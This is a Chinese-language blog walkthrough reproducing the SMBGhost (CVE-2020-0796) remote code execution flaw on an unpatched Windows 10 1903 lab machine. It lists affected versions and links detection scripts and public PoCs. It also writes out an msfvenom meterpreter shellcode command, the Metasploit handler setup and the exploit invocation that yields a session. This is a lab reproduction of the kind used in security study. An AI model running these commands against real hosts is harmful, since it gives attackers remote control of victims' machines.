cve-2020-0796_CVE20200796(SMBv3远程代码执行)Windows10漏洞复现

漏洞描述

      2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

影响版本

Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

漏洞检测

检测脚本

https://github.com/ollypwn/SMBGhost

奇安信检测脚本

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

蓝屏的poc地址

https://github.com/eerykitty/CVE-2020-0796-PoC

环境搭建

Windows10-1903

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|

da0faa01bf5d0e756140452dc2565bd0.png

首先使用systeminfo确定下主机有没有打过这个补丁KB4551762

c01d77adf74fe7e216d1cfadf4f0ee95.png

漏洞复现

靶机:192.168.0.120(Win10 1903版本)Kali攻击机:192.168.0.116

使用检测工具检测是否存在该漏洞

8ac39e9e51bdc4c5c0ea87b663cf9c1b.png

下载利用脚本

https://github.com/chompie1337/SMBGhost_RCE_PoC.git

使用 msfvenom生成 shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp lport=8888 -f py -o code.txt
b51b8f07636ed22147b7a8151788e14e.png

然后将生成code里的buf替换为USER_PAYLOAD

97a830445577e40faade2433c6891e58.png

然后把这一段代码粘贴到exploit.py脚本当中

faca39ccaa4bea2fe005b9d46bd98472.png

MSF启动监听

msfconsoleuse exploit/multi/handler set payload windows/x64/meterpreter/bind_tcpset  lport 8888set rhost 192.168.0.120show optionsrun

脚本运行,成功反弹回话

python3 exploit.py -ip 192.168.0.120

425abf954cf3a0bb48295adcda2eceb9.png

注意:POC打的过程中,容易出现蓝屏或者重启,使用时应注意!

e056471f4f147ffb2f66db6a16492624.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值